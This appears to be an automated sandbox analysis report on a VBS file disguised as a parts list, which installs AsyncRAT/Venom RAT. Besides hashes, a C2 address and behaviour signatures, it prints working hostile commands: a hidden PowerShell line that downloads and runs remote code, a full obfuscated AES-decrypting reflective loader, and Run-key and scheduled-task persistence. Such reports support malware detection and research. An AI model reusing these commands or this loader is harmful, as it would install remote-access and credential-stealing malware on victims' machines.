Analysis
-
max time kernel
145s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-12-2024 14:26
Static task
static1
Behavioral task
behavioral1
Sample
List of Required PN#_Desc_&_Qty Details.vbs
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
List of Required PN#_Desc_&_Qty Details.vbs
Resource
win10v2004-20241007-en
General
-
Target
List of Required PN#_Desc_&_Qty Details.vbs
-
Size
79KB
-
MD5
c0e2ce250c4979a59970d22fd99f340f
-
SHA1
4e5ad3c3ed1e8871abfd8d0f8466b3ddbc521be0
-
SHA256
9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2
-
SHA512
f6b43f831302a4760f0d6a8a6e822156b68423f6b0a8e313088007ec28e3e7fc0c9f1ba3659bdff7e7889faf6ec30eb8b826a0a3ebf8c3533b38b0318d483404
-
SSDEEP
1536:lcX2qy9/TpzprFm7xcGhX4y7t3t+JlpbebTQOsod:lcX2pl+HhXVxqild
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
OMEN core i9
45.88.88.7:4164
qqkyuzisfolbtlf
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/1952-64-0x0000028BEE550000-0x0000028BEE568000-memory.dmp family_asyncrat -
Blocklisted process makes network request 17 IoCs
flow pid Process 34 1952 powershell.exe 35 1952 powershell.exe 38 1952 powershell.exe 39 1952 powershell.exe 40 1952 powershell.exe 44 1952 powershell.exe 45 1952 powershell.exe 46 1952 powershell.exe 50 1952 powershell.exe 51 1952 powershell.exe 52 1952 powershell.exe 53 1952 powershell.exe 54 1952 powershell.exe 55 1952 powershell.exe 56 1952 powershell.exe 57 1952 powershell.exe 58 1952 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 2204 powershell.exe 4600 powershell.exe 64 powershell.exe 1952 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftService = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat\"" WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 2204 powershell.exe 2204 powershell.exe 4600 powershell.exe 4600 powershell.exe 64 powershell.exe 64 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2204 powershell.exe Token: SeDebugPrivilege 4600 powershell.exe Token: SeDebugPrivilege 64 powershell.exe Token: SeIncreaseQuotaPrivilege 64 powershell.exe Token: SeSecurityPrivilege 64 powershell.exe Token: SeTakeOwnershipPrivilege 64 powershell.exe Token: SeLoadDriverPrivilege 64 powershell.exe Token: SeSystemProfilePrivilege 64 powershell.exe Token: SeSystemtimePrivilege 64 powershell.exe Token: SeProfSingleProcessPrivilege 64 powershell.exe Token: SeIncBasePriorityPrivilege 64 powershell.exe Token: SeCreatePagefilePrivilege 64 powershell.exe Token: SeBackupPrivilege 64 powershell.exe Token: SeRestorePrivilege 64 powershell.exe Token: SeShutdownPrivilege 64 powershell.exe Token: SeDebugPrivilege 64 powershell.exe Token: SeSystemEnvironmentPrivilege 64 powershell.exe Token: SeRemoteShutdownPrivilege 64 powershell.exe Token: SeUndockPrivilege 64 powershell.exe Token: SeManageVolumePrivilege 64 powershell.exe Token: 33 64 powershell.exe Token: 34 64 powershell.exe Token: 35 64 powershell.exe Token: 36 64 powershell.exe Token: SeIncreaseQuotaPrivilege 64 powershell.exe Token: SeSecurityPrivilege 64 powershell.exe Token: SeTakeOwnershipPrivilege 64 powershell.exe Token: SeLoadDriverPrivilege 64 powershell.exe Token: SeSystemProfilePrivilege 64 powershell.exe Token: SeSystemtimePrivilege 64 powershell.exe Token: SeProfSingleProcessPrivilege 64 powershell.exe Token: SeIncBasePriorityPrivilege 64 powershell.exe Token: SeCreatePagefilePrivilege 64 powershell.exe Token: SeBackupPrivilege 64 powershell.exe Token: SeRestorePrivilege 64 powershell.exe Token: SeShutdownPrivilege 64 powershell.exe Token: SeDebugPrivilege 64 powershell.exe Token: SeSystemEnvironmentPrivilege 64 powershell.exe Token: SeRemoteShutdownPrivilege 64 powershell.exe Token: SeUndockPrivilege 64 powershell.exe Token: SeManageVolumePrivilege 64 powershell.exe Token: 33 64 powershell.exe Token: 34 64 powershell.exe Token: 35 64 powershell.exe Token: 36 64 powershell.exe Token: SeIncreaseQuotaPrivilege 64 powershell.exe Token: SeSecurityPrivilege 64 powershell.exe Token: SeTakeOwnershipPrivilege 64 powershell.exe Token: SeLoadDriverPrivilege 64 powershell.exe Token: SeSystemProfilePrivilege 64 powershell.exe Token: SeSystemtimePrivilege 64 powershell.exe Token: SeProfSingleProcessPrivilege 64 powershell.exe Token: SeIncBasePriorityPrivilege 64 powershell.exe Token: SeCreatePagefilePrivilege 64 powershell.exe Token: SeBackupPrivilege 64 powershell.exe Token: SeRestorePrivilege 64 powershell.exe Token: SeShutdownPrivilege 64 powershell.exe Token: SeDebugPrivilege 64 powershell.exe Token: SeSystemEnvironmentPrivilege 64 powershell.exe Token: SeRemoteShutdownPrivilege 64 powershell.exe Token: SeUndockPrivilege 64 powershell.exe Token: SeManageVolumePrivilege 64 powershell.exe Token: 33 64 powershell.exe Token: 34 64 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1952 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4592 wrote to memory of 2204 4592 WScript.exe 85 PID 4592 wrote to memory of 2204 4592 WScript.exe 85 PID 4592 wrote to memory of 2520 4592 WScript.exe 103 PID 4592 wrote to memory of 2520 4592 WScript.exe 103 PID 2520 wrote to memory of 1988 2520 cmd.exe 105 PID 2520 wrote to memory of 1988 2520 cmd.exe 105 PID 2520 wrote to memory of 4600 2520 cmd.exe 106 PID 2520 wrote to memory of 4600 2520 cmd.exe 106 PID 4600 wrote to memory of 64 4600 powershell.exe 107 PID 4600 wrote to memory of 64 4600 powershell.exe 107 PID 4600 wrote to memory of 2812 4600 powershell.exe 110 PID 4600 wrote to memory of 2812 4600 powershell.exe 110 PID 2812 wrote to memory of 1604 2812 WScript.exe 111 PID 2812 wrote to memory of 1604 2812 WScript.exe 111 PID 1604 wrote to memory of 2368 1604 cmd.exe 113 PID 1604 wrote to memory of 2368 1604 cmd.exe 113 PID 1604 wrote to memory of 1952 1604 cmd.exe 114 PID 1604 wrote to memory of 1952 1604 cmd.exe 114
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\List of Required PN#_Desc_&_Qty Details.vbs"1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1Elx3Sctpo07VJY1RgoaRojmCs/l4e8YyOviovJt3MU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0frhhpE1hB3Q0RCUXEd+g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vNThT=New-Object System.IO.MemoryStream(,$param_var); $tYiMG=New-Object System.IO.MemoryStream; $LFBux=New-Object System.IO.Compression.GZipStream($vNThT, [IO.Compression.CompressionMode]::Decompress); $LFBux.CopyTo($tYiMG); $LFBux.Dispose(); $vNThT.Dispose(); $tYiMG.Dispose(); $tYiMG.ToArray();}function execute_function($param_var,$param2_var){ $zInbo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xuOPn=$zInbo.EntryPoint; $xuOPn.Invoke($null, $param2_var);}$Orgvi = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $Orgvi;$gYhAt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Orgvi).Split([Environment]::NewLine);foreach ($jYIFP in $gYhAt) { if ($jYIFP.StartsWith('hvdMXDExQOuXjNppwfgb')) { $JMsAA=$jYIFP.Substring(20); break; }}$payloads_var=[string[]]$JMsAA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:1988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_35_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_35.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:64
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_35.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_35.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1Elx3Sctpo07VJY1RgoaRojmCs/l4e8YyOviovJt3MU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0frhhpE1hB3Q0RCUXEd+g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vNThT=New-Object System.IO.MemoryStream(,$param_var); $tYiMG=New-Object System.IO.MemoryStream; $LFBux=New-Object System.IO.Compression.GZipStream($vNThT, [IO.Compression.CompressionMode]::Decompress); $LFBux.CopyTo($tYiMG); $LFBux.Dispose(); $vNThT.Dispose(); $tYiMG.Dispose(); $tYiMG.ToArray();}function execute_function($param_var,$param2_var){ $zInbo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xuOPn=$zInbo.EntryPoint; $xuOPn.Invoke($null, $param2_var);}$Orgvi = 'C:\Users\Admin\AppData\Roaming\Windows_Log_35.bat';$host.UI.RawUI.WindowTitle = $Orgvi;$gYhAt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Orgvi).Split([Environment]::NewLine);foreach ($jYIFP in $gYhAt) { if ($jYIFP.StartsWith('hvdMXDExQOuXjNppwfgb')) { $JMsAA=$jYIFP.Substring(20); break; }}$payloads_var=[string[]]$JMsAA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:2368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1952
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
Filesize
1KB
MD58432f55d21c034cd767d75efdbd407e0
SHA1d2163aac34f4277bd55162f2609c853348852869
SHA25662f2b61b88e4cfae117a2bb2f93201b161ef0260de36492bb75194edb4bae27e
SHA5126c191d49f01f7efba21f0dd438fe57efb1a9051ecd39adcaddf983341e1e0cd9740013fc56af43b4bb84e602320af27e756685b6b02e60adc2d6c611c4739368
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
69KB
MD58078d12b395b01ad397cec896ae02a6a
SHA12a5b18660c4b2b40969651ca16a1ede64f3aecf5
SHA2560c691215924b9a058ad733c185b1eb24f5b7be83206ad634a3027bd4641689a7
SHA512df31dc5758e39eaf761d7874ed47ca42274a57b333e7469423c65ecf676e41494e08bb7cf051e21faf39a69fa0198576696e05f981952ce21d714e32cd3bee2a
-
Filesize
114B
MD588425a397008913b398756c37819c530
SHA1048bcb1b329243ea1cf109940138c6c1c1ebd472
SHA256f26f63f1384dcafaf7ed78685b5f9c1f8366cb79cdb139914a5a066f92139e1d
SHA5128cf7ef0ee114b22b31569141c52aa9883aa3d4fb684bd24100b4ec553606fe00cf0dc4285a01feeb786d34cfade97637790c940a0254121dab1e2c00fa77df31